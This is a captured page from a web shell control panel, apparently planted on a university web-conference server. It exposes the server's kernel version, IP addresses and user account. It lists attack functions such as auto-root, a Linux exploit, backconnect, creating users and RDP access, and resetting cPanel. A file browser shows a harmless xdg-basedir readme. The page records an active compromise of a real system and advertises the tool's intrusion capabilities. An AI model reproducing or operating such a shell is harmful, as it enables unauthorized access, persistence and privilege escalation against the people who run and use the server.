Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.222.182.149
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
node-xdg-basedir /
[ HOME SHELL ]
Name
Size
Permission
Action
changelog.Debian.gz
260
B
-rw-r--r--
copyright
1.44
KB
-rw-r--r--
readme.md
1.54
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : readme.md
# xdg-basedir [![Build Status](https://travis-ci.org/sindresorhus/xdg-basedir.svg?branch=master)](https://travis-ci.org/sindresorhus/xdg-basedir) > Get [XDG Base Directory](https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html) paths ## Install ``` $ npm install --save xdg-basedir ``` ## Usage ```js const xdgBasedir = require('xdg-basedir'); xdgBasedir.data; //=> '/home/sindresorhus/.local/share' xdgBasedir.config; //=> '/home/sindresorhus/.config' xdgBasedir.dataDirs //=> ['/home/sindresorhus/.local/share', '/usr/local/share/', '/usr/share/'] ``` ## API The properties `.data`, `.config`, `.cache`, `.runtime` will return `null` in the uncommon case that both the XDG environment variable is not set and the users home directory can't be found. You need to handle this case. A common solution is to [fall back to a temp directory](https://github.com/yeoman/configstore/blob/b82690fc401318ad18dcd7d151a0003a4898a314/index.js#L15). ### .data Directory for user specific data files. ### .config Directory for user specific configuration files. ### .cache Directory for user specific non-essential data files. ### .runtime Directory for user-specific non-essential runtime files and other file objects (such as sockets, named pipes, etc). ### .dataDirs Preference-ordered array of base directories to search for data files in addition to `.data`. ### .configDirs Preference-ordered array of base directories to search for configuration files in addition to `.config`. ## License MIT © [Sindre Sorhus](https://sindresorhus.com)
Close